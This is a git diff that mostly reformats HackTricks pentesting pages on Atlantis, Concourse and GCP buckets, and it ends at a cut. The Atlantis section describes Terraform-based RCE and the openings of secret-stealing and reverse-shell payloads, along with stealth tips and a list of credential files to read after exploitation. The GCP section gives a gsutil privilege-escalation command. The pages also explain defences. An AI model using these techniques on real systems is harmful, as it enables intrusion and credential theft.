You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
|
||||
|
||||
## Corporate Sponsors
|
||||
### Corporate Sponsors
|
||||
|
||||
### [STM Cyber](https://www.stmcyber.com)
|
||||
#### [STM Cyber](https://www.stmcyber.com)
|
||||
|
||||
![](<.gitbook/assets/image (642) (1) (1) (1).png>)
|
||||
|
||||
|
@ -59,15 +58,15 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
**STM Cyber** also support cybersecurity open source projects like HackTricks :)
|
||||
|
||||
### [**INE**](https://ine.com)
|
||||
#### [**INE**](https://ine.com)
|
||||
|
||||
![](.gitbook/assets/ine\_logo-3-.jpg)
|
||||
![](<.gitbook/assets/INE\_Logo (3).jpg>)
|
||||
|
||||
[**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.**
|
||||
|
||||
**INE** also support cybersecurity open source projects like HackTricks :)
|
||||
|
||||
#### **Courses and Certifications reviews**
|
||||
**Courses and Certifications reviews**
|
||||
|
||||
You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page:
|
||||
|
||||
|
@ -75,12 +74,11 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their *
|
|||
[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## License
|
||||
### License
|
||||
|
||||
**Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\
|
||||
**If you want to use it with commercial purposes, contact me.**
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -96,5 +94,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Atlantis
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,25 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Atlantis
|
||||
|
||||
# Atlantis
|
||||
|
||||
## Basic Information
|
||||
### Basic Information
|
||||
|
||||
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
|
||||
|
||||
![](<../.gitbook/assets/image (307) (3).png>)
|
||||
|
||||
## Local Lab
|
||||
### Local Lab
|
||||
|
||||
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
|
||||
2. Create a **personal token** (with repo access) of your **github** user
|
||||
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
|
||||
1. You can access the web page in 127.0.0.1:4141
|
||||
|
||||
## Atlantis Access
|
||||
### Atlantis Access
|
||||
|
||||
### Git Server Credentials
|
||||
#### Git Server Credentials
|
||||
|
||||
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
|
||||
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
|
||||
|
@ -44,7 +43,7 @@ However, in order to access the repos in those platforms and perform actions, it
|
|||
In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
|
||||
{% endhint %}
|
||||
|
||||
### Webhooks
|
||||
#### Webhooks
|
||||
|
||||
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
|
||||
|
||||
|
@ -56,7 +55,7 @@ Note that unless you use a private github or bitbucket server, you will need to
|
|||
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
|
||||
{% endhint %}
|
||||
|
||||
### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
|
||||
#### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
|
||||
|
||||
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
|
||||
|
||||
|
@ -74,18 +73,18 @@ It's up to you how you [provide credentials](https://www.runatlantis.io/docs/pro
|
|||
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
|
||||
{% endhint %}
|
||||
|
||||
### Web Page
|
||||
#### Web Page
|
||||
|
||||
By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
|
||||
|
||||
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
|
||||
|
||||
## Server Configuration
|
||||
### Server Configuration
|
||||
|
||||
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
|
||||
|
||||
* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
|
||||
* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)****
|
||||
* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)\*\*\*\*
|
||||
|
||||
Values are **chosen in this order**:
|
||||
|
||||
|
@ -97,34 +96,34 @@ Values are **chosen in this order**:
|
|||
Note that in the configuration you might find interesting values such as **tokens and passwords**.
|
||||
{% endhint %}
|
||||
|
||||
### Repos Configuration
|
||||
#### Repos Configuration
|
||||
|
||||
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
|
||||
|
||||
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
|
||||
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
|
||||
2. ****[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
|
||||
2. \*\*\*\*[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
|
||||
3. **Default** values
|
||||
|
||||
#### PR Protections
|
||||
**PR Protections**
|
||||
|
||||
Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable` ** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
|
||||
Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be \*\*`mergeable` \*\* (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
|
||||
|
||||
In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
|
||||
|
||||
#### Scripts
|
||||
**Scripts**
|
||||
|
||||
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) **** (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) **** (_post workflow hooks_) a **workflow is executed.**
|
||||
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) \*\*\*\* (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) \*\*\*\* (_post workflow hooks_) a **workflow is executed.**
|
||||
|
||||
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml` ** file.
|
||||
There isn't any option to allow **specifying** these scripts in the \*\*repo `/atlantis.yml` \*\* file.
|
||||
|
||||
#### Workflow
|
||||
**Workflow**
|
||||
|
||||
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
|
||||
****Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
|
||||
\*\*\*\*Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
|
||||
|
||||
{% hint style="danger" %}
|
||||
If the flag **** `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
|
||||
If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
|
||||
This will basically give **RCE in the Atlantis server to any user that can access that repo**.
|
||||
|
||||
```yaml
|
||||
|
@ -145,7 +144,7 @@ workflows:
|
|||
```
|
||||
{% endhint %}
|
||||
|
||||
#### Conftest Policy Checking
|
||||
**Conftest Policy Checking**
|
||||
|
||||
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include:
|
||||
|
||||
|
@ -156,9 +155,9 @@ Atlantis supports running **server-side** [**conftest**](https://www.conftest.de
|
|||
|
||||
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
|
||||
|
||||
## Atlantis Commands
|
||||
### Atlantis Commands
|
||||
|
||||
****[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
|
||||
\*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
|
||||
|
||||
```bash
|
||||
# Get help
|
||||
|
@ -169,7 +168,7 @@ atlantis plan [options] -- [terraform plan flags]
|
|||
##Options:
|
||||
## -d directory
|
||||
## -p project
|
||||
## --verbose
|
||||
## --verbose
|
||||
## You can also add extra terraform options
|
||||
|
||||
# Run terraform apply
|
||||
|
@ -183,7 +182,7 @@ atlantis apply [options] -- [terraform apply flags]
|
|||
## You can also add extra terraform options
|
||||
```
|
||||
|
||||
## Attacks
|
||||
### Attacks
|
||||
|
||||
{% hint style="warning" %}
|
||||
If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
|
||||
|
@ -196,9 +195,9 @@ atlantis plan -- -lock=false
|
|||
```
|
||||
{% endhint %}
|
||||
|
||||
### Atlantis plan RCE - Config modification in new PR
|
||||
#### Atlantis plan RCE - Config modification in new PR
|
||||
|
||||
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan` ** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
|
||||
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
|
||||
|
||||
You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source). Just put a payload like the following in the `main.tf` file:
|
||||
|
||||
|
@ -208,7 +207,7 @@ data "external" "example" {
|
|||
}
|
||||
```
|
||||
|
||||
#### Stealthier Attack
|
||||
**Stealthier Attack**
|
||||
|
||||
You can perform this attack even in a **stealthier way**, by following this suggestions:
|
||||
|
||||
|
@ -225,19 +224,19 @@ You can find the rev shell code in [https://github.com/carlospolop/terraform\_ex
|
|||
* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
|
||||
* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
|
||||
|
||||
### Atlantis apply RCE - Config modification in new PR
|
||||
#### Atlantis apply RCE - Config modification in new PR
|
||||
|
||||
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
|
||||
|
||||
However, you will usually need to bypass some protections:
|
||||
|
||||
* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
|
||||
* Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)****
|
||||
* Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)\*\*\*\*
|
||||
* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
|
||||
* By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)****
|
||||
* By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)\*\*\*\*
|
||||
|
||||
Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
|
||||
 **** You just need to make sure some payload like the following ones ends in the `main.tf` file:
|
||||
\*\*\*\* You just need to make sure some payload like the following ones ends in the `main.tf` file:
|
||||
|
||||
```json
|
||||
// Payload 1 to just steal a secret
|
||||
|
@ -257,7 +256,7 @@ resource "null_resource" "rev_shell" {
|
|||
|
||||
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
|
||||
|
||||
### Terraform Param Injection
|
||||
#### Terraform Param Injection
|
||||
|
||||
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
|
||||
|
||||
|
@ -271,13 +270,13 @@ atlantis apply -- -h #Get terraform apply help
|
|||
|
||||
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
|
||||
|
||||
### Custom Workflow
|
||||
#### Custom Workflow
|
||||
|
||||
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
|
||||
This possibility was mentioned in a previous section:
|
||||
|
||||
{% hint style="danger" %}
|
||||
If the flag **** `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
|
||||
If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
|
||||
This will basically give **RCE in the Atlantis server to any user that can access that repo**.
|
||||
|
||||
```yaml
|
||||
|
@ -298,7 +297,7 @@ workflows:
|
|||
```
|
||||
{% endhint %}
|
||||
|
||||
### PR Hijacking
|
||||
#### PR Hijacking
|
||||
|
||||
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
|
||||
|
||||
|
@ -306,13 +305,13 @@ Moreover, if you don't have configured in the **branch protection** to ask to **
|
|||
|
||||
This is the **setting** in Github branch protections:
|
||||
|
||||
![](<../.gitbook/assets/image (375) (1).png>)
|
||||
![](<../.gitbook/assets/image (307) (4).png>)
|
||||
|
||||
### Webhook Secret
|
||||
#### Webhook Secret
|
||||
|
||||
If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
|
||||
|
||||
### Bitbucket
|
||||
#### Bitbucket
|
||||
|
||||
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
|
||||
|
||||
|
@ -320,28 +319,28 @@ Bitbucket Cloud does **not support webhook secrets**. This could allow attackers
|
|||
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
|
||||
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
|
||||
|
||||
## Post-Exploitation
|
||||
### Post-Exploitation
|
||||
|
||||
If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
|
||||
|
||||
* `/home/atlantis/.git-credentials` Contains vcs access credentials
|
||||
* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
|
||||
* `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stated file
|
||||
* Example: /atlantis-data/repos/ghOrg_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
|
||||
* Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate
|
||||
* `/proc/1/environ` Env variables
|
||||
* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
|
||||
|
||||
## Mitigations
|
||||
### Mitigations
|
||||
|
||||
### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
|
||||
#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
|
||||
|
||||
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
|
||||
|
||||
### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
|
||||
#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
|
||||
|
||||
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
|
||||
|
||||
### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
|
||||
#### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
|
||||
|
||||
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
|
||||
|
||||
|
@ -352,7 +351,7 @@ Atlantis requires you to specify a allowlist of repositories it will accept webh
|
|||
|
||||
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
|
||||
|
||||
### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
|
||||
#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
|
||||
|
||||
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
|
||||
|
||||
|
@ -362,30 +361,29 @@ To prevent this, you could:
|
|||
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
|
||||
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
|
||||
|
||||
### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
|
||||
#### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
|
||||
|
||||
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
|
||||
|
||||
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
|
||||
|
||||
#### [#](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
|
||||
[**#**](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)**Azure DevOps Basic Authentication**
|
||||
|
||||
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
|
||||
|
||||
### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
|
||||
#### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
|
||||
|
||||
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
|
||||
|
||||
### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
|
||||
#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
|
||||
|
||||
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
|
||||
|
||||
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
|
||||
|
||||
## References
|
||||
|
||||
* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)****
|
||||
### References
|
||||
|
||||
* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\*
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -402,5 +400,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Concourse Architecture
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,20 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Concourse Architecture
|
||||
|
||||
# Concourse Architecture
|
||||
### Architecture
|
||||
|
||||
## Architecture
|
||||
![](<../../.gitbook/assets/image (307) (3) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (651) (1) (1).png>)
|
||||
|
||||
### ATC: web UI & build scheduler
|
||||
#### ATC: web UI & build scheduler
|
||||
|
||||
The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
|
||||
|
||||
The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
|
||||
|
||||
### TSA: worker registration & forwarding
|
||||
#### TSA: worker registration & forwarding
|
||||
|
||||
The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
|
||||
|
||||
|
@ -37,14 +36,13 @@ The TSA by **default listens on port `2222`**, and is usually colocated with the
|
|||
|
||||
The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
|
||||
|
||||
### Workers
|
||||
#### Workers
|
||||
|
||||
In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
|
||||
|
||||
* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
|
||||
* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -60,5 +58,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,37 +16,36 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
|
||||
|
||||
# GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
|
||||
|
||||
## Public Assets Discovery
|
||||
### Public Assets Discovery
|
||||
|
||||
One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
|
||||
|
||||
Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
|
||||
|
||||
## Public Resources Brute-Force
|
||||
### Public Resources Brute-Force
|
||||
|
||||
### Buckets, Firebase, Apps & Cloud Functions
|
||||
#### Buckets, Firebase, Apps & Cloud Functions
|
||||
|
||||
* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
|
||||
* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
|
||||
|
||||
### Buckets
|
||||
#### Buckets
|
||||
|
||||
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
|
||||
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
|
||||
|
||||
![](<../../.gitbook/assets/image (628) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (618).png>)
|
||||
|
||||
The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
|
||||
|
||||
* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
|
||||
|
||||
## Privilege Escalation
|
||||
### Privilege Escalation
|
||||
|
||||
If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
|
||||
|
||||
### Check Permissions
|
||||
#### Check Permissions
|
||||
|
||||
There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
|
||||
|
||||
|
@ -54,7 +53,7 @@ However, if your user (potentially belonging to allUsers or allAuthenticatedUser
|
|||
|
||||
The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
|
||||
|
||||
### Escalating
|
||||
#### Escalating
|
||||
|
||||
With the “gsutil” Google Storage CLI program, we can run the following command to grant “allAuthenticatedUsers” access to the “Storage Admin” role, thus **escalating the privileges we were granted** to the bucket:
|
||||
|
||||
|
@ -64,11 +63,10 @@ gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
|
|||
|
||||
One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**.
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -84,5 +82,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Pickle Rick
|
||||
|
||||
<details>
|
||||
|
||||
|
